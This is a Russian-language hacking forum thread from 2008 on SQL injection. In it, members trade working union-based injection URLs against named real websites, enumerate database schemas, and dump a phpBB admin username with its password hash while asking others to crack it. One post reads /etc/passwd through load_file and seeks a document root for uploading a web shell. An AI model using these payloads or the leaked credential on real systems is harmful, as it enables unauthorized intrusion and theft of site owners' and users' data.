SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. BanQui

    BanQui Elder - Старейшина

    Joined:
    10 Jul 2008
    Messages:
    68
    Likes Received:
    18
    Reputations:
    -11
    slider слух у мну вопрос!Как ты вычислил ентот managerpassword и managerlogin ??? Методом тыка или как? Просто вот такой вот ссылкочкой например www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(column_name,0x3a,column_schema)+from+information_schema.columns+limit+1,1/*
    Мне ошибку пишет!!! Обьясни плиз я в этом деле новичек ((
     
  2. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    2 BanQui
    А что это у тебя за столбец column_schema?
    Может нужно так ? ;)
    http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(column_name,0x3a,table_schema)+from+information_schema.columns+limit+1,1/*
    Ошибки нету
     
  3. BanQui

    BanQui Elder - Старейшина

    Joined:
    10 Jul 2008
    Messages:
    68
    Likes Received:
    18
    Reputations:
    -11
    СПс терь другой вопрос смари http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(column_name,0x3a,table_schema)+from+information_schema.columns+limit+1,1/* - Ошибки нет
    http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(column_name,0x3a,table_schema)+from+information_schema.columns+limit+2,1/* - Ошибки нет
    И так до 4 а вот тут
    http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(column_name,0x3a,table_schema)+from+information_schema.columns+limit+5,1/* - Ошибка есть и дальше они тоже присутствуют!
     
  4. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    мдауж, откуда ты взял этот table_schema ??? table_name!
     
  5. BanQui

    BanQui Elder - Старейшина

    Joined:
    10 Jul 2008
    Messages:
    68
    Likes Received:
    18
    Reputations:
    -11
    Omg!Приношу свой извенения за свой тупизм)))))Спасибо!!! Вазьму на заметку ИМХО много раз отступал от взлома сайтоф именно по этому((
     
  6. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    статьи для кого пишут? :) почитай чтобы в следующий раз "не отступать от взлома" ;)))
     
    1 person likes this.
  7. BanQui

    BanQui Elder - Старейшина

    Joined:
    10 Jul 2008
    Messages:
    68
    Likes Received:
    18
    Reputations:
    -11
    Кстати вот тут еще одну фигню нашел токо что то не получаетцо никак информатион схемку вывести! Версия 4.0.24_Debian-10sarge2-log
    Вот как пытался и пытаюсь чтото менять но пока не выходит ((( http://www.audit.by/new/index.php?id=10&spr=-999999+union+select+1,2,table_name+from+information_schema.tables+limit+1,1/*
     
    1 person likes this.
  8. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    см. мой совет выше ^-^
    в 4.0.24 нет information_schema...
    вапросы по уязвимостям тут, а то щас и тебе и мне минусов наставят... :)
     
  9. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Ну и накурили тут вы =)

    BanQui information_table есть только в пятой ветке скуля....
     
  10. BanQui

    BanQui Elder - Старейшина

    Joined:
    10 Jul 2008
    Messages:
    68
    Likes Received:
    18
    Reputations:
    -11
    Нашел вот енто

    http://www.adams-motors.ru/new.php?id=-2+union+select+1,TABLE_NAME,concat(column_name,0x3a,table_schema)%20FROM%20INFORMATION_SCHEMA.columns+limit+559,1/*

    Попыталсо сделать вот так:
    http://www.adams-motors.ru/new.php?id=-2+union+select+1,aes_decrypt(aes_encrypt(concat(0x3a,user_newpasswd),0x71),0x71)%20FROM%20adamsold/*

    Нече не выходит!!!
     
  11. Мистерео

    Мистерео Elder - Старейшина

    Joined:
    7 Aug 2006
    Messages:
    33
    Likes Received:
    32
    Reputations:
    1
    блин что вы курите...
    Вот смотрим версию
    Code:
    http://www.adams-motors.ru/new.php?id=-2+union+select+version(),2,3/*
    Ага версия пятая смотрим таблицы
    Code:
    http://www.adams-motors.ru/new.php?id=-2+union+select+table_name,2,3+from+information_schema.tables+limit+1,1/*
    находим таблицы вот актуальные
    Code:
    Action
    Akssesuar
    Colors
    Complekt
    Foto
    Foto_old
    Marks
    Menu
    Models
    Old_avto
    People
    Texts
    Vacancy
    accessories
    all_details
    details
    documentation
    files
    files_up
    forum
    graphic_people
    inner
    news
    news_details
    дальше идут таблицы форума (на движке phpbb)
    среди них есть таблица phpbb_users
    роем на колонки
    Code:
    http://www.adams-motors.ru/new.php?id=-2+union+select+column_name,2,3+from+information_schema.columns+where+table_name=0x70687062625f7573657273+limit+1,1/*
    Где 0x70687062625f7573657273 зашифрованое 16ти битным шифрованием наша таблица phpbb_users
    находим нужные нам колонки username и user_password и составляем запрос
    Code:
    http://www.adams-motors.ru/new.php?id=-2+union+select+concat_ws(0x3a,username,user_password),2,3+from+phpbb_users+limit+1,1/*
    Получаем логин админа и зашифрованый пароль а именно
    admin:178f6c2365ac7511b4bf37c8e89cc678

    кто расшифрует скиньте пасс в личку плиз.

    Вот и все
     
    #5911 Мистерео, 11 Jul 2008
    Last edited: 11 Jul 2008
  12. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    Ххе...это лежит на xaker.name уже много месяцев...
     
    2 people like this.
  13. Мистерео

    Мистерео Elder - Старейшина

    Joined:
    7 Aug 2006
    Messages:
    33
    Likes Received:
    32
    Reputations:
    1
    дык я человеку выше ее раскрутил
     
    1 person likes this.
  14. ask-me-how

    ask-me-how New Member

    Joined:
    25 Jun 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Неправильно выставленные права мускул юзера позволяют читать (и возможно писать) файлы:

    http://ns1.profsurv.com/category_list.php?x_category_id=-1%20union%20select%20load_file(0x2f6574632f706173737764)

    Не смог найти документрут чтобы залить шелл, кто найдет раскрытие пути или документрут - скиньте в личку, интересно.
     
    #5914 ask-me-how, 11 Jul 2008
    Last edited: 11 Jul 2008
  15. 2la.painkiller

    2la.painkiller New Member

    Joined:
    22 May 2008
    Messages:
    26
    Likes Received:
    4
    Reputations:
    -10
    Где 0x70687062625f7573657273 зашифрованое 16ти битным шифрованием наша таблица phpbb_users


    Научите переводить в 16бит!!!
     
    #5915 2la.painkiller, 11 Jul 2008
    Last edited: 11 Jul 2008
  16. Мистерео

    Мистерео Elder - Старейшина

    Joined:
    7 Aug 2006
    Messages:
    33
    Likes Received:
    32
    Reputations:
    1
    http://snak3.h17.ru/tools/ вот там и есть 16 битное шифрование
     
  17. 2la.painkiller

    2la.painkiller New Member

    Joined:
    22 May 2008
    Messages:
    26
    Likes Received:
    4
    Reputations:
    -10
    ссылка не работает
     
  18. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Pangeaday.org - PR 6
    нече интересного в БД не нашел..
     
  19. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    http://hack-shop.org.ru/tools-code-encode
     
    #5919 ~!DoK_tOR!~, 11 Jul 2008
    Last edited: 11 Jul 2008
  20. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    2 people like this.
Thread Status:
Not open for further replies.